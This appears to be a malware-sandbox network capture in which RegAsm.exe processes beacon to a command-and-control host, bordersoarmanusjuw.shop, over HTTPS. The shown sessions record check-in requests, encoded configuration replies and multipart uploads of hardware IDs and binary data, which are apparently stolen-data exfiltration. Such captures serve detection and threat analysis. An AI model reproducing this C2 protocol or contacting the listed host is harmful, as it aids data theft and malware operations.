                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66b0lNnNs4iqCx2cgcmJ%2BygARvF%2Ftk%2FjJaqxgyR9W9FwZEsmTTDy8RB6O7bMe3iOwr7XLsH1ID91unV1YMuCt7zjIGKFHKT2eatUWyVdoTRS1nBJM6En3dUK8o1KagAmyfqRBlE1ycDgTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe5fede44d5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:21 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-04-21 13:31:22 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=0c6kuq9nujuin70ppgqqkps54s; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GkHC65XrCrEMaaH%2FKaVb5wteIkRSKmA297nhXyPUfY4XkboGYP9Vjkl3a44YzA0xSrBQDt40rdt28Uwj%2BSNTbsQpW1UN5MgWXef6sikrR89OLETOoxLR8MejnUzemiENP5EYXHtGxPHIeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbe5af76455a-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-04-21 13:31:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:22 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:22 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-04-21 13:31:22 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=oap6rt9k31pj3cg7lga94acvtp; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlQ0fa1ApR9XWV7xZqdfGw4LFO1SGMyMWDtSpfo%2BwZc9yc6AXwL9pzICjmLWqjrUszplSTc3RDf8F1h%2FOwAOR0DQQG6Lfxqy2s4Too73q6LDjowbKUVHOKVfQg%2BpW8yRzDSm9ps6rgWtIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbea1c1d0711-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49747 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:22 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
2024-04-21 13:31:22 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-04-21 13:31:22 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=896g04hsi9icum6o9m389lbmt0; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44m7Yc7%2FbsZJGoFmlnI5tPpXtIEE2v%2FCsDStkxJT4PDAEuFhlOuICqDSN849e%2B1YKe9fkJxU1pxXJxgA1ClcX8UBYdisdM0nDI%2Bd4e8e52NY6%2BK1JqDJLTV0Xvtlhs4m4b%2BZoS55uIl9bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbea992fadd5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            Data Ascii: FlPYhSbHN+Vu9kmj15tTsgz2bvxOAWRrUKOlW5E8BYIWSsGIOso74i2UK7+V9TmlZJMF/AdlT1hS5LMJzX9FqhRQ34M4yzvlY/JLpNeUWbUJ9G+3CWwLChap/VWhFS7iGkSU02iMEO1i9wDIsIIc1GfhBtdrKQgMUPz/W852TaweWt+HJs016Gj0R6/clFW8CuppsQlpBAkaoLwQiTAtyXYc05NqlH6uX/tWsNjdOtcTtgXUa3Bna3vkuheJJgf
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 49 77 6d 6a 47 53 73 4c 66 31 4d 72 39 69 53 55 62 38 4e 38 6e 79 75 44 47 41 48 42 52 79 76 73 78 33 62 65 45 71 72 48 6c 2f 64 6a 43 4c 41 4e 75 31 71 76 41 37 49 73 50 59 53 75 78 53 34 4e 76 35 41 53 68 67 51 48 65 54 56 63 4e 59 77 4c 63 6b 45 4e 4c 2f 67 61 73 73 77 72 6a 57 2b 41 4b 6a 57 6c 56 69 34 43 2f 56 70 75 67 6c 37 42 67 55 65 70 4c 6b 51 78 6e 68 42 6f 52 31 4f 30 6f 38 69 7a 7a 48 6a 59 2f 39 45 34 4a 58 31 4f 64 64 4d 2f 33 62 38 57 43 74 50 4d 68 32 71 70 68 54 4f 62 30 2f 69 64 54 66 4c 78 55 4b 6e 4a 59 59 47 6c 77 43 6e 31 39 30 4b 2f 6b 7a 38 59 4b 34 4c 61 41 51 4c 48 71 4f 79 48 73 4e 2b 53 71 59 65 55 74 2b 4b 4b 63 51 78 34 32 50 32 53 61 6e 63 6b 56 61 37 54 4c 59 47 31 32 73 70 43 42 68 51 2f 50 39 62 34 6c 39 6f 6a 68 70 47
                                                                                                                                            Data Ascii: IwmjGSsLf1Mr9iSUb8N8nyuDGAHBRyvsx3beEqrHl/djCLANu1qvA7IsPYSuxS4Nv5AShgQHeTVcNYwLckENL/gasswrjW+AKjWlVi4C/Vpugl7BgUepLkQxnhBoR1O0o8izzHjY/9E4JX1OddM/3b8WCtPMh2qphTOb0/idTfLxUKnJYYGlwCn190K/kz8YK4LaAQLHqOyHsN+SqYeUt+KKcQx42P2SanckVa7TLYG12spCBhQ/P9b4l9ojhpG
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 73 71 35 47 72 77 56 71 76 61 6e 6b 53 78 48 4c 67 47 31 78 38 6e 5a 32 73 4a 7a 4e 5a 77 69 58 6c 4a 34 6b 55 65 6c 49 30 6a 79 6a 76 6f 59 2b 35 46 70 74 53 53 57 37 55 49 38 47 32 38 42 47 30 49 42 52 4f 6f 74 68 7a 4b 63 55 47 72 45 31 58 62 79 32 53 6b 56 34 55 74 2b 31 6a 67 67 39 38 53 6e 52 66 37 59 72 46 41 41 57 51 66 58 73 7a 57 41 71 45 56 4c 75 49 61 55 4a 54 54 61 49 77 77 34 47 6a 38 53 71 62 66 6d 46 53 32 43 66 68 6c 76 77 39 74 43 51 51 66 70 4c 59 53 79 48 68 41 71 42 5a 61 32 59 67 73 79 6e 79 67 42 5a 63 72 34 4e 79 46 45 75 52 4f 75 45 36 6e 44 57 55 49 51 48 6a 50 6f 6c 57 68 46 56 7a 4b 64 6a 65 55 6a 43 61 4d 5a 4b 77 74 39 30 79 6b 33 4a 31 66 76 77 54 39 61 72 59 46 61 51 63 53 47 4b 53 36 43 64 74 2b 54 4b 63 52 58 39 53 50 4c
                                                                                                                                            Data Ascii: sq5GrwVqvankSxHLgG1x8nZ2sJzNZwiXlJ4kUelI0jyjvoY+5FptSSW7UI8G28BG0IBROothzKcUGrE1Xby2SkV4Ut+1jgg98SnRf7YrFAAWQfXszWAqEVLuIaUJTTaIww4Gj8SqbfmFS2Cfhlvw9tCQQfpLYSyHhAqBZa2YgsynygBZcr4NyFEuROuE6nDWUIQHjPolWhFVzKdjeUjCaMZKwt90yk3J1fvwT9arYFaQcSGKS6Cdt+TKcRX9SPL
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 47 6c 33 2f 75 73 2f 59 35 2f 42 53 34 4e 76 35 41 58 41 77 4f 48 71 4f 72 43 6f 52 5a 53 36 55 63 53 73 53 63 4a 59 78 79 68 67 61 58 41 4b 61 62 78 52 44 76 51 70 41 46 31 30 42 74 48 6b 42 49 35 75 31 4a 6b 69 73 57 39 55 30 4f 76 4f 41 31 67 6c 53 46 64 4a 51 72 79 35 75 4c 45 75 52 4f 71 69 44 55 61 77 4a 50 45 6c 44 38 2f 31 75 4f 66 56 65 77 47 31 2f 43 69 47 33 79 41 73 6c 37 39 6b 65 77 33 49 70 64 2f 45 4b 51 42 64 64 41 5a 6b 39 59 55 70 33 56 63 4b 49 56 42 61 73 61 52 38 57 64 4a 39 77 37 72 67 57 58 4b 35 2b 56 39 54 6e 58 54 4f 41 75 35 45 49 70 4f 67 4d 65 71 72 6f 4e 32 44 4e 69 74 42 64 62 78 49 77 39 77 33 79 67 42 5a 63 72 34 4e 33 64 43 76 35 66 74 67 62 58 61 79 6b 4c 45 56 44 38 2f 30 75 62 4a 52 44 78 53 67 79 47 34 30 48 54 63 6f
                                                                                                                                            Data Ascii: Gl3/us/Y5/BS4Nv5AXAwOHqOrCoRZS6UcSsScJYxyhgaXAKabxRDvQpAF10BtHkBI5u1JkisW9U0OvOA1glSFdJQry5uLEuROqiDUawJPElD8/1uOfVewG1/CiG3yAsl79kew3Ipd/EKQBddAZk9YUp3VcKIVBasaR8WdJ9w7rgWXK5+V9TnXTOAu5EIpOgMeqroN2DNitBdbxIw9w3ygBZcr4N3dCv5ftgbXaykLEVD8/0ubJRDxSgyG40HTco
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 79 4c 44 32 45 72 4e 4d 6f 43 79 46 51 47 6f 64 45 6c 2b 31 71 78 62 5a 65 51 6d 71 44 46 48 59 79 32 53 4f 66 4b 4a 70 39 30 79 6c 33 49 30 64 72 68 7a 7a 59 71 70 4d 62 52 31 41 58 75 62 39 43 73 4a 78 56 36 77 61 45 38 57 64 4a 39 77 2f 36 32 71 77 53 4c 48 57 6b 52 4c 79 54 72 68 37 74 77 78 76 41 68 56 66 74 61 73 59 33 33 6b 4a 71 67 78 52 32 4d 73 56 67 6c 53 46 42 72 78 59 34 49 50 66 45 6f 6b 50 39 6d 43 37 46 6e 68 43 49 42 75 6f 76 68 66 49 65 51 58 73 64 54 65 2f 79 79 79 4d 5a 4b 77 2b 73 69 6a 4c 73 4e 31 57 72 55 79 67 4c 4f 78 53 4d 6c 70 54 52 2f 54 76 63 36 4a 68 43 38 70 32 52 62 7a 67 51 59 77 71 72 6a 57 2b 45 75 36 7a 39 6a 6e 38 48 72 67 32 2f 6b 41 75 44 42 49 43 6f 72 34 4e 79 6a 6c 37 6e 42 78 52 32 38 63 6b 78 7a 7a 70 66 65 70
                                                                                                                                            Data Ascii: yLD2ErNMoCyFQGodEl+1qxbZeQmqDFHYy2SOfKJp90yl3I0drhzzYqpMbR1AXub9CsJxV6waE8WdJ9w/62qwSLHWkRLyTrh7twxvAhVftasY33kJqgxR2MsVglSFBrxY4IPfEokP9mC7FnhCIBuovhfIeQXsdTe/yyyMZKw+sijLsN1WrUygLOxSMlpTR/Tvc6JhC8p2RbzgQYwqrjW+Eu6z9jn8Hrg2/kAuDBICor4Nyjl7nBxR28ckxzzpfep


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:22 UTC | 289 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18158
Host: bordersoarmanusjuw.shop
2024-04-21 13:31:22 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:22 UTC | 2827 | OUT | Data Raw: (binary payload)
2024-04-21 13:31:23 UTC | 816 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=oqonkosndarkuqd3gveibj9vba; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7JrzjxFa5a7k1rwqefX%2FBlV8vFEmxGk0Jra2jYL9xOYkAF3e%2Fap3OB%2F4SkT6TY%2F2RKtVfk2QH5e60P622vCIydFG1ox98oyyrvT60rj9eNg4pA%2FSqxHwcGbeyc1p0IxCCVKAFU9HlpOeg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbbea2b24b066-ATL
alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:23 UTC | 289 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18158
Host: bordersoarmanusjuw.shop
2024-04-21 13:31:23 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:23 UTC | 2827 | OUT | Data Raw: (binary payload)
2024-04-21 13:31:23 UTC | 818 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7vefi2hs9vak532h1umpolfu37; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GOz4dT9azjDJ1XZwzXnzmVD%2Fv1MLm3r1fXZ5%2BVEq3NMNYEbbGK0KUts%2BCtlhwm2iD8%2FAeiGpNf15%2F9hSniTBvgf4kIkS32htPJ%2FEJwwOEnQTRF6FzpPv5zBMXaPMKa4Kw88ABmi61djGcg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbbee4b5169ef-ATL
alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-21 13:31:23 UTC | 289 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18158
Host: bordersoarmanusjuw.shop
2024-04-21 13:31:23 UTC | 15331 | OUT | Data Ascii:
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

879B2FF1AFA74E08B399523B6273FBFA
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

H8NgCl--
--b
2024-04-21 13:31:23 UTC | 2827 | OUT | Data Raw: (binary payload)
2024-04-21 13:31:23 UTC | 810 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Apr 2024 13:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0gnf2uc5o4lfefgshq1iomsiij; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4kLRo78KfOjzog6%2B6MqaABZ8Ugs8bYvChgBvn2MHqeEFPVd1tEHlz9O51OVLzoZA8sYU8CqpYeD9gfJ1royCmVfaEanOYJBvNnm%2B0qK0ynBkxgRfHyg66W1xK2riVhLM4qnTfo6XMoZTg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 877dbbeeac6d135d-ATL
alt-svc: h3=":443"; ma=86400
2024-04-21 13:31:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
Data Ascii: fok 81.181.57.52
2024-04-21 13:31:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            11 | 192.168.2.4 | 49751 | 172.67.189.66 | 443 | 1740 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:23 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:23 UTC | 8779 | OUT | Data Ascii:
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="hwid"

                                                                                                                                            879B2FF1AFA74E08B399523B6273FBFA
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="pid"

                                                                                                                                            2
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="lid"

                                                                                                                                            H8NgCl--
                                                                                                                                            --b
                                                                                                                                            2024-04-21 13:31:23 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ubl6u7em0dqj597ci55n3ggqcf; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Jw9Kpq9dhL74tf9KmKb%2F3x9OHj7joW5wmLmUoBDuDrhTDt5aIISMGlf3YK37s6hPLbtfMe6cYpHpIrPVoU%2FKsmOlzx2egzOIboVz21XyOF3ENH7T4xmtrMrrDvkaTA0hxOPHFebz0X0Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbef0e454569-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: f
                                                                                                                                            ok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            12 | 192.168.2.4 | 49752 | 172.67.189.66 | 443 | 5856 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:24 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC | 8779 | OUT | Data Ascii:
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="hwid"

                                                                                                                                            879B2FF1AFA74E08B399523B6273FBFA
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="pid"

                                                                                                                                            2
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="lid"

                                                                                                                                            H8NgCl--
                                                                                                                                            --b
                                                                                                                                            2024-04-21 13:31:24 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:24 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=od7d0mbfh5paprd78ctqq6rtbs; expires=Thu, 15-Aug-2024 07:18:03 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G7VqHIiMTsd2w6zDEHLp3m3jVRV7MBX43hpExD82feKhDJdvLj8r93yA3okSAWsFr%2B3R0%2FNVoZfQAeILgjUYAjF3F68mT70i8zC7UkQSbtoWJRNAlWrwWKcmxNP4PevS3sNLrWAVZR4%2BWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbf37fd9674c-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: f
                                                                                                                                            ok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            13 | 192.168.2.4 | 49753 | 172.67.189.66 | 443 | 5900 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            2024-04-21 13:31:24 UTC | 288 | OUT | POST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:24 UTC | 8779 | OUT | Data Ascii:
                                                                                                                                            --be85de5ipdocierre1
                                                                                                                                            Content-Disposition: form-data; name="hwid"
